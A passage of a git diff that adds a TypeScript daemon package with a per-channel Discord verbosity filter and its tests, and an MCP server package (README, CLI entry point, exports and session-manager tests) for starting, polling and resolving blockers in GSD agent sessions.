String((uiEvent as Record).title ?? (uiEvent as Record).message ?? ''), + event: uiEvent, + }; +} diff --git a/packages/daemon/src/types.ts b/packages/daemon/src/types.ts new file mode 100644 index 000000000..822d1ff9b --- /dev/null +++ b/packages/daemon/src/types.ts @@ -0,0 +1,199 @@ +import type { RpcClient, SdkAgentEvent, RpcExtensionUIRequest } from '@gsd-build/rpc-client'; + +/** + * Log severity levels, ordered from most to least verbose. + */ +export type LogLevel = 'debug' | 'info' | 'warn' | 'error'; + +/** + * Per-channel verbosity for Discord event streaming. + * - 'default': tool calls, messages, transitions, blockers, errors, completions + * - 'verbose': everything including cost_update and status events + * - 'quiet': only blockers, errors, completions + */ +export type VerbosityLevel = 'default' | 'verbose' | 'quiet'; + +/** + * A single structured log entry written as JSON-lines. + */ +export interface LogEntry { + /** ISO-8601 timestamp */ + ts: string; + level: LogLevel; + msg: string; + data?: Record; +} + +/** + * Top-level daemon configuration, loaded from YAML. + */ +export interface DaemonConfig { + discord?: { + token: string; + guild_id: string; + owner_id: string; + /** When true, DM the owner on blocker events in addition to channel messages */ + dm_on_blocker?: boolean; + /** Discord channel ID where the orchestrator listens for natural language commands */ + control_channel_id?: string; + /** LLM orchestrator settings */ + orchestrator?: { + model?: string; + max_tokens?: number; + }; + }; + projects: { + scan_roots: string[]; + }; + log: { + file: string; + level: LogLevel; + max_size_mb: number; + }; +} + +// --------------------------------------------------------------------------- +// Session Status +// --------------------------------------------------------------------------- + +export type SessionStatus = 'starting' | 'running' | 'blocked' | 'completed' | 'error' | 'cancelled'; + +// --------------------------------------------------------------------------- +// Managed Session +// --------------------------------------------------------------------------- + +/** + * A daemon-managed GSD headless session. + */ +export interface ManagedSession { + /** Unique session ID returned from RpcClient.init() */ + sessionId: string; + + /** Absolute path to the project directory */ + projectDir: string; + + /** Human-readable project name (basename of projectDir) */ + projectName: string; + + /** Current lifecycle status */ + status: SessionStatus; + + /** The RpcClient instance managing the agent process */ + client: RpcClient; + + /** Ring buffer of recent events (capped at MAX_EVENTS) */ + events: SdkAgentEvent[]; + + /** Pending blocker requiring user response, if any */ + pendingBlocker: PendingBlocker | null; + + /** Cumulative cost tracking (max pattern per K004) */ + cost: CostAccumulator; + + /** Session start timestamp */ + startTime: number; + + /** Error message if status is 'error' */ + error?: string; + + /** Cleanup function to unsubscribe from events */ + unsubscribe?: () => void; +} + +// --------------------------------------------------------------------------- +// Pending Blocker +// --------------------------------------------------------------------------- + +export interface PendingBlocker { + /** The extension_ui_request id */ + id: string; + + /** The request method (e.g. 'select', 'confirm', 'input') */ + method: string; + + /** Human-readable message or title */ + message: string; + + /** Full event payload for inspection */ + event: RpcExtensionUIRequest; +} + +// --------------------------------------------------------------------------- +// Cost Accumulator (K004 — cumulative-max) +// --------------------------------------------------------------------------- + +export interface CostAccumulator { + totalCost: number; + tokens: { + input: number; + output: number; + cacheRead: number; + cacheWrite: number; + }; +} + +// --------------------------------------------------------------------------- +// Project Info — scanner output +// --------------------------------------------------------------------------- + +/** Marker types detectable by the project scanner */ +export type ProjectMarker = 'git' | 'node' | 'gsd' | 'rust' | 'python' | 'go'; + +export interface ProjectInfo { + /** Directory name (basename) */ + name: string; + + /** Absolute path to the project directory */ + path: string; + + /** Detected marker types */ + markers: ProjectMarker[]; + + /** Most recent mtime of detected marker files/dirs (epoch ms) */ + lastModified: number; +} + +// --------------------------------------------------------------------------- +// Start Session Options +// --------------------------------------------------------------------------- + +export interface StartSessionOptions { + /** Absolute path to the project directory */ + projectDir: string; + + /** Command to send after '/gsd auto' (default: none) */ + command?: string; + + /** Model ID override */ + model?: string; + + /** Run in bare mode (skip user config) */ + bare?: boolean; + + /** Path to CLI binary (overrides GSD_CLI_PATH and which resolution) */ + cliPath?: string; +} + +// --------------------------------------------------------------------------- +// Formatted Event — output of event-formatter.ts +// --------------------------------------------------------------------------- + +/** + * Formatted Discord message payload for a GSD event. + * content is the plain-text fallback; embeds and components are optional. + */ +export interface FormattedEvent { + content: string; + embed?: import('discord.js').EmbedBuilder; + components?: import('discord.js').ActionRowBuilder[]; +} + +// --------------------------------------------------------------------------- +// Constants +// --------------------------------------------------------------------------- + +/** Maximum number of events kept in the ring buffer (larger than mcp-server's 50 — daemon forwards events to Discord) */ +export const MAX_EVENTS = 100; + +/** Timeout for RpcClient initialization (ms) */ +export const INIT_TIMEOUT_MS = 30_000; diff --git a/packages/daemon/src/verbosity.test.ts b/packages/daemon/src/verbosity.test.ts new file mode 100644 index 000000000..42c61e9b6 --- /dev/null +++ b/packages/daemon/src/verbosity.test.ts @@ -0,0 +1,171 @@ +import { describe, it, beforeEach } from 'node:test'; +import assert from 'node:assert/strict'; +import { VerbosityManager, shouldShowAtLevel } from './verbosity.js'; + +// --------------------------------------------------------------------------- +// VerbosityManager +// --------------------------------------------------------------------------- + +describe('VerbosityManager', () => { + let vm: VerbosityManager; + + beforeEach(() => { + vm = new VerbosityManager(); + }); + + it('returns default level for unknown channel', () => { + assert.equal(vm.getLevel('chan-1'), 'default'); + }); + + it('set/get round-trips', () => { + vm.setLevel('chan-1', 'quiet'); + assert.equal(vm.getLevel('chan-1'), 'quiet'); + vm.setLevel('chan-1', 'verbose'); + assert.equal(vm.getLevel('chan-1'), 'verbose'); + }); + + it('different channels are independent', () => { + vm.setLevel('chan-a', 'quiet'); + vm.setLevel('chan-b', 'verbose'); + assert.equal(vm.getLevel('chan-a'), 'quiet'); + assert.equal(vm.getLevel('chan-b'), 'verbose'); + assert.equal(vm.getLevel('chan-c'), 'default'); + }); + + it('shouldShow delegates to the level-based filter', () => { + vm.setLevel('chan-q', 'quiet'); + assert.equal(vm.shouldShow('chan-q', 'tool_execution_start'), false); + assert.equal(vm.shouldShow('chan-q', 'extension_ui_request'), true); + }); +}); + +// --------------------------------------------------------------------------- +// shouldShowAtLevel — quiet +// --------------------------------------------------------------------------- + +describe('shouldShowAtLevel — quiet', () => { + const level = 'quiet' as const; + + it('shows blockers', () => { + assert.equal(shouldShowAtLevel(level, 'extension_ui_request'), true); + }); + + it('shows execution_complete', () => { + assert.equal(shouldShowAtLevel(level, 'execution_complete'), true); + }); + + it('shows error', () => { + assert.equal(shouldShowAtLevel(level, 'error'), true); + }); + + it('shows session_error', () => { + assert.equal(shouldShowAtLevel(level, 'session_error'), true); + }); + + it('hides tool calls', () => { + assert.equal(shouldShowAtLevel(level, 'tool_execution_start'), false); + assert.equal(shouldShowAtLevel(level, 'tool_execution_end'), false); + }); + + it('hides messages', () => { + assert.equal(shouldShowAtLevel(level, 'message_start'), false); + assert.equal(shouldShowAtLevel(level, 'message'), false); + }); + + it('hides cost_update', () => { + assert.equal(shouldShowAtLevel(level, 'cost_update'), false); + }); + + it('hides task_transition', () => { + assert.equal(shouldShowAtLevel(level, 'task_transition'), false); + }); + + it('hides unknown events', () => { + assert.equal(shouldShowAtLevel(level, 'totally_random'), false); + }); +}); + +// --------------------------------------------------------------------------- +// shouldShowAtLevel — default +// --------------------------------------------------------------------------- + +describe('shouldShowAtLevel — default', () => { + const level = 'default' as const; + + it('shows blockers', () => { + assert.equal(shouldShowAtLevel(level, 'extension_ui_request'), true); + }); + + it('shows execution_complete', () => { + assert.equal(shouldShowAtLevel(level, 'execution_complete'), true); + }); + + it('shows error', () => { + assert.equal(shouldShowAtLevel(level, 'error'), true); + }); + + it('shows tool calls', () => { + assert.equal(shouldShowAtLevel(level, 'tool_execution_start'), true); + assert.equal(shouldShowAtLevel(level, 'tool_execution_end'), true); + }); + + it('shows messages', () => { + assert.equal(shouldShowAtLevel(level, 'message_start'), true); + assert.equal(shouldShowAtLevel(level, 'message_end'), true); + assert.equal(shouldShowAtLevel(level, 'message'), true); + }); + + it('shows task_transition', () => { + assert.equal(shouldShowAtLevel(level, 'task_transition'), true); + }); + + it('shows session_started', () => { + assert.equal(shouldShowAtLevel(level, 'session_started'), true); + }); + + it('hides cost_update', () => { + assert.equal(shouldShowAtLevel(level, 'cost_update'), false); + }); + + it('hides status events', () => { + assert.equal(shouldShowAtLevel(level, 'state_update'), false); + assert.equal(shouldShowAtLevel(level, 'status'), false); + }); + + it('hides unknown events', () => { + assert.equal(shouldShowAtLevel(level, 'something_weird'), false); + }); +}); + +// --------------------------------------------------------------------------- +// shouldShowAtLevel — verbose +// --------------------------------------------------------------------------- + +describe('shouldShowAtLevel — verbose', () => { + const level = 'verbose' as const; + + it('shows everything that quiet/default show', () => { + const events = [ + 'extension_ui_request', 'execution_complete', 'error', 'session_error', + 'tool_execution_start', 'tool_execution_end', 'message_start', 'message_end', + 'message', 'task_transition', 'session_started', + ]; + for (const e of events) { + assert.equal(shouldShowAtLevel(level, e), true, `Expected verbose to show ${e}`); + } + }); + + it('shows cost_update', () => { + assert.equal(shouldShowAtLevel(level, 'cost_update'), true); + }); + + it('shows status events', () => { + assert.equal(shouldShowAtLevel(level, 'state_update'), true); + assert.equal(shouldShowAtLevel(level, 'status'), true); + assert.equal(shouldShowAtLevel(level, 'set_status'), true); + }); + + it('shows unknown/arbitrary events', () => { + assert.equal(shouldShowAtLevel(level, 'something_arbitrary'), true); + }); +}); diff --git a/packages/daemon/src/verbosity.ts b/packages/daemon/src/verbosity.ts new file mode 100644 index 000000000..e40b11c87 --- /dev/null +++ b/packages/daemon/src/verbosity.ts @@ -0,0 +1,101 @@ +/** + * verbosity.ts — Per-channel verbosity filter for Discord event streaming. + * + * Controls which RPC event types reach each Discord channel. + * Three levels: + * - 'quiet': blockers, errors, completions only + * - 'default': tool calls, messages, transitions, blockers, errors, completions + * - 'verbose': everything (adds cost_update, status, generic events) + */ + +import type { VerbosityLevel } from './types.js'; + +// --------------------------------------------------------------------------- +// Event classification +// --------------------------------------------------------------------------- + +/** Event types that are always shown (even in quiet mode). */ +const ALWAYS_SHOWN: ReadonlySet = new Set([ + 'extension_ui_request', // blockers + 'execution_complete', + 'error', + 'session_error', +]); + +/** Event types shown at default level and above. */ +const DEFAULT_SHOWN: ReadonlySet = new Set([ + 'tool_execution_start', + 'tool_execution_end', + 'message_start', + 'message_end', + 'message', + 'task_transition', + 'session_started', +]); + +/** Event types shown only at verbose level. */ +const VERBOSE_ONLY: ReadonlySet = new Set([ + 'cost_update', + 'state_update', + 'status', + 'set_status', + 'set_widget', + 'set_title', +]); + +// --------------------------------------------------------------------------- +// VerbosityManager +// --------------------------------------------------------------------------- + +export class VerbosityManager { + private levels: Map = new Map(); + + /** Get the verbosity level for a channel. Defaults to 'default'. */ + getLevel(channelId: string): VerbosityLevel { + return this.levels.get(channelId) ?? 'default'; + } + + /** Set the verbosity level for a channel. */ + setLevel(channelId: string, level: VerbosityLevel): void { + this.levels.set(channelId, level); + } + + /** + * Determine whether an event of the given type should be shown + * in the specified channel. + */ + shouldShow(channelId: string, eventType: string): boolean { + const level = this.getLevel(channelId); + return shouldShowAtLevel(level, eventType); + } +} + +// --------------------------------------------------------------------------- +// Pure filter — exported for direct use and testability +// --------------------------------------------------------------------------- + +/** + * Pure predicate: should an event of this type be shown at the given verbosity level? + */ +export function shouldShowAtLevel(level: VerbosityLevel, eventType: string): boolean { + // Always-shown events pass through regardless of level + if (ALWAYS_SHOWN.has(eventType)) return true; + + switch (level) { + case 'quiet': + // Quiet only shows ALWAYS_SHOWN events + return false; + + case 'default': + // Default shows ALWAYS_SHOWN + DEFAULT_SHOWN + return DEFAULT_SHOWN.has(eventType); + + case 'verbose': + // Verbose shows everything + return true; + + default: + // Unknown level → treat as default + return DEFAULT_SHOWN.has(eventType); + } +} diff --git a/packages/daemon/tsconfig.json b/packages/daemon/tsconfig.json new file mode 100644 index 000000000..779b48aca --- /dev/null +++ b/packages/daemon/tsconfig.json @@ -0,0 +1,24 @@ +{ + "compilerOptions": { + "target": "ES2024", + "module": "Node16", + "lib": ["ES2024"], + "strict": true, + "esModuleInterop": true, + "skipLibCheck": true, + "forceConsistentCasingInFileNames": true, + "declaration": true, + "declarationMap": true, + "sourceMap": true, + "inlineSources": true, + "inlineSourceMap": false, + "moduleResolution": "Node16", + "resolveJsonModule": true, + "allowImportingTsExtensions": false, + "types": ["node"], + "outDir": "./dist", + "rootDir": "./src" + }, + "include": ["src/**/*.ts"], + "exclude": ["node_modules", "dist", "**/*.d.ts", "src/**/*.d.ts"] +} diff --git a/packages/mcp-server/.npmignore b/packages/mcp-server/.npmignore new file mode 100644 index 000000000..5aedf8f6e --- /dev/null +++ b/packages/mcp-server/.npmignore @@ -0,0 +1 @@ +dist/*.test.* diff --git a/packages/mcp-server/README.md b/packages/mcp-server/README.md new file mode 100644 index 000000000..fd4783ea9 --- /dev/null +++ b/packages/mcp-server/README.md @@ -0,0 +1,202 @@ +# @gsd-build/mcp-server + +MCP server exposing GSD orchestration tools for Claude Code, Cursor, and other MCP-compatible clients. + +Start GSD auto-mode sessions, poll progress, resolve blockers, and retrieve results — all through the [Model Context Protocol](https://modelcontextprotocol.io/). + +## Installation + +```bash +npm install @gsd-build/mcp-server +``` + +Or with the monorepo workspace: + +```bash +# Already available as a workspace package +npx gsd-mcp-server +``` + +## Configuration + +### Claude Code + +Add to your project's `.mcp.json`: + +```json +{ + "mcpServers": { + "gsd": { + "command": "npx", + "args": ["gsd-mcp-server"], + "env": { + "GSD_CLI_PATH": "/path/to/gsd" + } + } + } +} +``` + +Or if installed globally: + +```json +{ + "mcpServers": { + "gsd": { + "command": "gsd-mcp-server" + } + } +} +``` + +### Cursor + +Add to `.cursor/mcp.json`: + +```json +{ + "mcpServers": { + "gsd": { + "command": "npx", + "args": ["gsd-mcp-server"], + "env": { + "GSD_CLI_PATH": "/path/to/gsd" + } + } + } +} +``` + +## Tools + +### `gsd_execute` + +Start a GSD auto-mode session for a project directory. + +| Parameter | Type | Required | Description | +|-----------|------|----------|-------------| +| `projectDir` | `string` | ✅ | Absolute path to the project directory | +| `command` | `string` | | Command to send (default: `"/gsd auto"`) | +| `model` | `string` | | Model ID override | +| `bare` | `boolean` | | Run in bare mode (skip user config) | + +**Returns:** `{ sessionId, status: "started" }` + +### `gsd_status` + +Poll the current status of a running GSD session. + +| Parameter | Type | Required | Description | +|-----------|------|----------|-------------| +| `sessionId` | `string` | ✅ | Session ID from `gsd_execute` | + +**Returns:** + +```json +{ + "status": "running", + "progress": { "eventCount": 42, "toolCalls": 15 }, + "recentEvents": [ ... ], + "pendingBlocker": null, + "cost": { "totalCost": 0.12, "tokens": { "input": 5000, "output": 2000, "cacheRead": 1000, "cacheWrite": 500 } }, + "durationMs": 45000 +} +``` + +### `gsd_result` + +Get the accumulated result of a session. Works for both running (partial) and completed sessions. + +| Parameter | Type | Required | Description | +|-----------|------|----------|-------------| +| `sessionId` | `string` | ✅ | Session ID from `gsd_execute` | + +**Returns:** + +```json +{ + "sessionId": "abc-123", + "projectDir": "/path/to/project", + "status": "completed", + "durationMs": 120000, + "cost": { ... }, + "recentEvents": [ ... ], + "pendingBlocker": null, + "error": null +} +``` + +### `gsd_cancel` + +Cancel a running session. Aborts the current operation and stops the agent process. + +| Parameter | Type | Required | Description | +|-----------|------|----------|-------------| +| `sessionId` | `string` | ✅ | Session ID from `gsd_execute` | + +**Returns:** `{ cancelled: true }` + +### `gsd_query` + +Query GSD project state from the filesystem without an active session. Returns STATE.md, PROJECT.md, requirements, and milestone listing. + +| Parameter | Type | Required | Description | +|-----------|------|----------|-------------| +| `projectDir` | `string` | ✅ | Absolute path to the project directory | +| `query` | `string` | ✅ | What to query (e.g. `"status"`, `"milestones"`) | + +**Returns:** + +```json +{ + "projectDir": "/path/to/project", + "state": "...", + "project": "...", + "requirements": "...", + "milestones": [ + { "id": "M001", "hasRoadmap": true, "hasSummary": false } + ] +} +``` + +### `gsd_resolve_blocker` + +Resolve a pending blocker in a session by sending a response to the blocked UI request. + +| Parameter | Type | Required | Description | +|-----------|------|----------|-------------| +| `sessionId` | `string` | ✅ | Session ID from `gsd_execute` | +| `response` | `string` | ✅ | Response to send for the pending blocker | + +**Returns:** `{ resolved: true }` + +## Environment Variables + +| Variable | Description | +|----------|-------------| +| `GSD_CLI_PATH` | Absolute path to the GSD CLI binary. If not set, the server resolves `gsd` via `which`. | + +## Architecture + +``` +┌─────────────────┐ stdio ┌──────────────────┐ +│ MCP Client │ ◄────────────► │ @gsd-build/mcp-server │ +│ (Claude Code, │ JSON-RPC │ │ +│ Cursor, etc.) │ │ SessionManager │ +└─────────────────┘ │ │ │ + │ ▼ │ + │ @gsd-build/rpc-client │ + │ │ │ + │ ▼ │ + │ GSD CLI (child │ + │ process via RPC)│ + └──────────────────┘ +``` + +- **@gsd-build/mcp-server** — MCP protocol adapter. Translates MCP tool calls into SessionManager operations. +- **SessionManager** — Manages RpcClient lifecycle. One session per project directory. Tracks events in a ring buffer (last 50), detects blockers, accumulates cost. +- **@gsd-build/rpc-client** — Low-level RPC client that spawns and communicates with the GSD CLI process via JSON-RPC over stdio. + +## License + +MIT diff --git a/packages/mcp-server/package.json b/packages/mcp-server/package.json new file mode 100644 index 000000000..449a074de --- /dev/null +++ b/packages/mcp-server/package.json @@ -0,0 +1,46 @@ +{ + "name": "@gsd-build/mcp-server", + "version": "2.52.0", + "description": "MCP server exposing GSD orchestration tools for Claude Code, Cursor, and other MCP clients", + "license": "MIT", + "repository": { + "type": "git", + "url": "https://github.com/gsd-build/gsd-2.git", + "directory": "packages/mcp-server" + }, + "publishConfig": { + "access": "public" + }, + "type": "module", + "main": "./dist/index.js", + "types": "./dist/index.d.ts", + "exports": { + ".": { + "types": "./dist/index.d.ts", + "import": "./dist/index.js" + } + }, + "bin": { + "gsd-mcp-server": "./dist/cli.js" + }, + "scripts": { + "build": "tsc", + "test": "node --test dist/mcp-server.test.js" + }, + "dependencies": { + "@modelcontextprotocol/sdk": "^1.27.1", + "@gsd-build/rpc-client": "^2.52.0", + "zod": "^4.0.0" + }, + "devDependencies": { + "@types/node": "^24.12.0", + "typescript": "^5.4.0" + }, + "engines": { + "node": ">=22.0.0" + }, + "files": [ + "dist", + "!dist/**/*.test.*" + ] +} diff --git a/packages/mcp-server/src/cli.ts b/packages/mcp-server/src/cli.ts new file mode 100644 index 000000000..744749d03 --- /dev/null +++ b/packages/mcp-server/src/cli.ts @@ -0,0 +1,68 @@ +#!/usr/bin/env node + +/** + * @gsd-build/mcp-server CLI — stdio transport entry point. + * + * Connects the MCP server to stdin/stdout for use by Claude Code, + * Cursor, and other MCP-compatible clients. + */ + +import { SessionManager } from './session-manager.js'; +import { createMcpServer } from './server.js'; + +const MCP_PKG = '@modelcontextprotocol/sdk'; + +async function main(): Promise { + const sessionManager = new SessionManager(); + + // Create the configured MCP server with all 12 tools (6 session + 6 read-only) + const { server } = await createMcpServer(sessionManager); + + // Dynamic import for StdioServerTransport (same TS subpath workaround) + const { StdioServerTransport } = await import(`${MCP_PKG}/server/stdio.js`); + const transport = new StdioServerTransport(); + + // Cleanup handler — stop all sessions before exiting + let cleaningUp = false; + async function cleanup(): Promise { + if (cleaningUp) return; + cleaningUp = true; + process.stderr.write('[gsd-mcp-server] Shutting down...\n'); + try { + await sessionManager.cleanup(); + } catch { + // swallow cleanup errors + } + try { + await server.close(); + } catch { + // swallow close errors + } + process.exit(0); + } + + process.on('SIGTERM', () => void cleanup()); + process.on('SIGINT', () => void cleanup()); + + // Handle stdin end — MCP client disconnected + process.stdin.on('end', () => void cleanup()); + + // Connect and start serving + try { + await server.connect(transport); + process.stderr.write('[gsd-mcp-server] MCP server started on stdio\n'); + } catch (err) { + process.stderr.write( + `[gsd-mcp-server] Fatal: failed to start — ${err instanceof Error ? err.message : String(err)}\n` + ); + await sessionManager.cleanup(); + process.exit(1); + } +} + +main().catch((err) => { + process.stderr.write( + `[gsd-mcp-server] Fatal: ${err instanceof Error ? err.message : String(err)}\n` + ); + process.exit(1); +}); diff --git a/packages/mcp-server/src/index.ts b/packages/mcp-server/src/index.ts new file mode 100644 index 000000000..c1b837305 --- /dev/null +++ b/packages/mcp-server/src/index.ts @@ -0,0 +1,28 @@ +/** + * @gsd-build/mcp-server — MCP server for GSD orchestration and project state. + */ + +export { SessionManager } from './session-manager.js'; +export { createMcpServer } from './server.js'; +export type { + SessionStatus, + ManagedSession, + ExecuteOptions, + PendingBlocker, + CostAccumulator, +} from './types.js'; +export { MAX_EVENTS, INIT_TIMEOUT_MS } from './types.js'; + +// Read-only state readers (usable without a running session) +export { readProgress } from './readers/state.js'; +export type { ProgressResult } from './readers/state.js'; +export { readRoadmap } from './readers/roadmap.js'; +export type { RoadmapResult, MilestoneInfo, SliceInfo, TaskInfo } from './readers/roadmap.js'; +export { readHistory } from './readers/metrics.js'; +export type { HistoryResult, MetricsUnit } from './readers/metrics.js'; +export { readCaptures } from './readers/captures.js'; +export type { CapturesResult, CaptureEntry } from './readers/captures.js'; +export { readKnowledge } from './readers/knowledge.js'; +export type { KnowledgeResult, KnowledgeEntry } from './readers/knowledge.js'; +export { runDoctorLite } from './readers/doctor-lite.js'; +export type { DoctorResult, DoctorIssue } from './readers/doctor-lite.js'; diff --git a/packages/mcp-server/src/mcp-server.test.ts b/packages/mcp-server/src/mcp-server.test.ts new file mode 100644 index 000000000..6d7ce156e --- /dev/null +++ b/packages/mcp-server/src/mcp-server.test.ts @@ -0,0 +1,628 @@ +/** + * @gsd-build/mcp-server — Integration and unit tests. + * + * Strategy: We cannot mock @gsd-build/rpc-client at the module level without + * --experimental-test-module-mocks. Instead we test by: + * + * 1. Subclassing SessionManager to inject a mock client factory + * 2. Testing event handling, state transitions, and error paths + * 3. Testing tool registration via createMcpServer + * 4. Testing CLI path resolution via static method + */ + +import { describe, it, beforeEach, afterEach } from 'node:test'; +import assert from 'node:assert/strict'; +import { resolve } from 'node:path'; +import { EventEmitter } from 'node:events'; + +import { SessionManager } from './session-manager.js'; +import { createMcpServer } from './server.js'; +import { MAX_EVENTS } from './types.js'; +import type { ManagedSession, CostAccumulator, PendingBlocker } from './types.js'; + +// --------------------------------------------------------------------------- +// Mock RpcClient (duck-typed to match RpcClient interface) +// --------------------------------------------------------------------------- + +class MockRpcClient { + started = false; + stopped = false; + aborted = false; + prompted: string[] = []; + private eventListeners: Array<(event: Record) => void> = []; + uiResponses: Array<{ requestId: string; response: Record }> = []; + + /** Control — set to make start() reject */ + startError: Error | null = null; + /** Control — set to make init() reject */ + initError: Error | null = null; + /** Control — override sessionId from init */ + initSessionId = 'mock-session-001'; + + cwd: string; + args: string[]; + + constructor(options?: Record) { + this.cwd = (options?.cwd as string) ?? ''; + this.args = (options?.args as string[]) ?? []; + } + + async start(): Promise { + if (this.startError) throw this.startError; + this.started = true; + } + + async stop(): Promise { + this.stopped = true; + } + + async init(): Promise<{ sessionId: string; version: string }> { + if (this.initError) throw this.initError; + return { sessionId: this.initSessionId, version: '2.51.0' }; + } + + onEvent(listener: (event: Record) => void): () => void { + this.eventListeners.push(listener); + return () => { + const idx = this.eventListeners.indexOf(listener); + if (idx >= 0) this.eventListeners.splice(idx, 1); + }; + } + + async prompt(message: string): Promise { + this.prompted.push(message); + } + + async abort(): Promise { + this.aborted = true; + } + + sendUIResponse(requestId: string, response: Record): void { + this.uiResponses.push({ requestId, response }); + } + + /** Test helper — emit an event to all listeners */ + emitEvent(event: Record): void { + for (const listener of this.eventListeners) { + listener(event); + } + } +} + +// --------------------------------------------------------------------------- +// TestableSessionManager — injects mock clients without module mocking +// --------------------------------------------------------------------------- + +/** + * Subclass that overrides startSession to use MockRpcClient instead of the + * real RpcClient. We directly construct the session object, mirroring the + * parent's logic but with our mock. + */ +class TestableSessionManager extends SessionManager { + /** The last mock client created */ + lastClient: MockRpcClient | null = null; + /** All mock clients */ + allClients: MockRpcClient[] = []; + /** Counter for unique session IDs across multiple sessions */ + private sessionCounter = 0; + /** Control: set to make startSession fail during init */ + nextInitError: Error | null = null; + /** Control: set to make startSession fail during start */ + nextStartError: Error | null = null; + + override async startSession(projectDir: string, options: { cliPath?: string; command?: string; model?: string; bare?: boolean } = {}): Promise { + if (!projectDir || projectDir.trim() === '') { + throw new Error('projectDir is required and cannot be empty'); + } + + const resolvedDir = resolve(projectDir); + + // Check duplicate via getSessionByDir + const existing = this.getSessionByDir(resolvedDir); + if (existing) { + throw new Error( + `Session already active for ${resolvedDir} (sessionId: ${existing.sessionId}, status: ${existing.status})` + ); + } + + const client = new MockRpcClient({ cwd: resolvedDir, args: [] }); + if (this.nextStartError) { + client.startError = this.nextStartError; + this.nextStartError = null; + } + if (this.nextInitError) { + client.initError = this.nextInitError; + this.nextInitError = null; + } + + this.sessionCounter++; + client.initSessionId = `mock-session-${String(this.sessionCounter).padStart(3, '0')}`; + this.lastClient = client; + this.allClients.push(client); + + // Create the session shell + const session: ManagedSession = { + sessionId: '', + projectDir: resolvedDir, + status: 'starting', + client: client as any, // duck-typed mock + events: [], + pendingBlocker: null, + cost: { totalCost: 0, tokens: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 } }, + startTime: Date.now(), + }; + + // Insert into internal sessions map — access via protected method + this._putSession(resolvedDir, session); + + try { + await client.start(); + + const initResult = await client.init(); + session.sessionId = initResult.sessionId; + session.status = 'running'; + + // Wire event tracking using the same handleEvent logic as parent + session.unsubscribe = client.onEvent((event: Record) => { + this._handleEvent(session, event); + }); + + // Kick off auto-mode + const command = options.command ?? '/gsd auto'; + await client.prompt(command); + + return session.sessionId; + } catch (err) { + session.status = 'error'; + session.error = err instanceof Error ? err.message : String(err); + try { await client.stop(); } catch { /* swallow */ } + throw new Error(`Failed to start session for ${resolvedDir}: ${session.error}`); + } + } + + /** Expose internal session map insertion for testing */ + _putSession(key: string, session: ManagedSession): void { + // Access the private sessions map via any cast + (this as any).sessions.set(key, session); + } + + /** Expose handleEvent for testing */ + _handleEvent(session: ManagedSession, event: Record): void { + (this as any).handleEvent(session, event); + } +} + +// --------------------------------------------------------------------------- +// Test helpers +// --------------------------------------------------------------------------- + +let allManagers: TestableSessionManager[] = []; + +function createManager(): TestableSessionManager { + const mgr = new TestableSessionManager(); + allManagers.push(mgr); + return mgr; +} + +// --------------------------------------------------------------------------- +// SessionManager unit tests +// --------------------------------------------------------------------------- + +describe('SessionManager', () => { + let sm: TestableSessionManager; + + beforeEach(() => { + sm = createManager(); + }); + + afterEach(async () => { + for (const mgr of allManagers) { + await mgr.cleanup(); + } + allManagers = []; + }); + + it('startSession creates session and returns sessionId', async () => { + const sessionId = await sm.startSession('/tmp/test-project', { cliPath: '/usr/bin/gsd' }); + assert.equal(sessionId, 'mock-session-001'); + + const session = sm.getSession(sessionId); + assert.ok(session); + assert.equal(session.status, 'running'); + assert.equal(session.projectDir, resolve('/tmp/test-project')); + }); + + it('startSession sends /gsd auto by default', async () => { + await sm.startSession('/tmp/test-prompt', { cliPath: '/usr/bin/gsd' }); + assert.ok(sm.lastClient); + assert.deepEqual(sm.lastClient.prompted, ['/gsd auto']); + }); + + it('startSession sends custom command when provided', async () => { + await sm.startSession('/tmp/test-cmd', { cliPath: '/usr/bin/gsd', command: '/gsd auto --resume' }); + assert.ok(sm.lastClient); + assert.deepEqual(sm.lastClient.prompted, ['/gsd auto --resume']); + }); + + it('startSession rejects duplicate projectDir', async () => { + await sm.startSession('/tmp/dup-test', { cliPath: '/usr/bin/gsd' }); + await assert.rejects( + () => sm.startSession('/tmp/dup-test', { cliPath: '/usr/bin/gsd' }), + (err: Error) => { + assert.ok(err.message.includes('Session already active')); + return true; + }, + ); + }); + + it('startSession rejects empty projectDir', async () => { + await assert.rejects( + () => sm.startSession('', { cliPath: '/usr/bin/gsd' }), + (err: Error) => { + assert.ok(err.message.includes('projectDir is required')); + return true; + }, + ); + }); + + it('startSession sets error status on start() failure', async () => { + sm.nextStartError = new Error('spawn failed'); + + await assert.rejects( + () => sm.startSession('/tmp/fail-start', { cliPath: '/usr/bin/gsd' }), + (err: Error) => { + assert.ok(err.message.includes('Failed to start session')); + assert.ok(err.message.includes('spawn failed')); + return true; + }, + ); + }); + + it('startSession sets error status on init() failure', async () => { + sm.nextInitError = new Error('handshake failed'); + + await assert.rejects( + () => sm.startSession('/tmp/fail-init', { cliPath: '/usr/bin/gsd' }), + (err: Error) => { + assert.ok(err.message.includes('Failed to start session')); + assert.ok(err.message.includes('handshake failed')); + return true; + }, + ); + }); + + it('getSession returns undefined for unknown sessionId', () => { + const result = sm.getSession('nonexistent-id'); + assert.equal(result, undefined); + }); + + it('getSessionByDir returns session for known dir', async () => { + await sm.startSession('/tmp/by-dir', { cliPath: '/usr/bin/gsd' }); + const session = sm.getSessionByDir('/tmp/by-dir'); + assert.ok(session); + assert.equal(session.sessionId, 'mock-session-001'); + }); + + it('resolveBlocker errors when no pending blocker', async () => { + const sessionId = await sm.startSession('/tmp/no-blocker', { cliPath: '/usr/bin/gsd' }); + await assert.rejects( + () => sm.resolveBlocker(sessionId, 'some response'), + (err: Error) => { + assert.ok(err.message.includes('No pending blocker')); + return true; + }, + ); + }); + + it('resolveBlocker errors for unknown session', async () => { + await assert.rejects( + () => sm.resolveBlocker('unknown-session', 'some response'), + (err: Error) => { + assert.ok(err.message.includes('Session not found')); + return true; + }, + ); + }); + + it('resolveBlocker clears pendingBlocker and sends UI response', async () => { + const sessionId = await sm.startSession('/tmp/blocker-resolve', { cliPath: '/usr/bin/gsd' }); + const client = sm.lastClient!; + + // Simulate a blocking UI request event + client.emitEvent({ + type: 'extension_ui_request', + id: 'req-42', + method: 'select', + title: 'Pick an option', + }); + + const session = sm.getSession(sessionId)!; + assert.ok(session.pendingBlocker); + assert.equal(session.status, 'blocked'); + + // Resolve the blocker + await sm.resolveBlocker(sessionId, 'option-a'); + + assert.equal(session.pendingBlocker, null); + assert.equal(session.status, 'running'); + assert.equal(client.uiResponses.length, 1); + assert.equal(client.uiResponses[0].requestId, 'req-42'); + }); + + it('cancelSession calls abort + 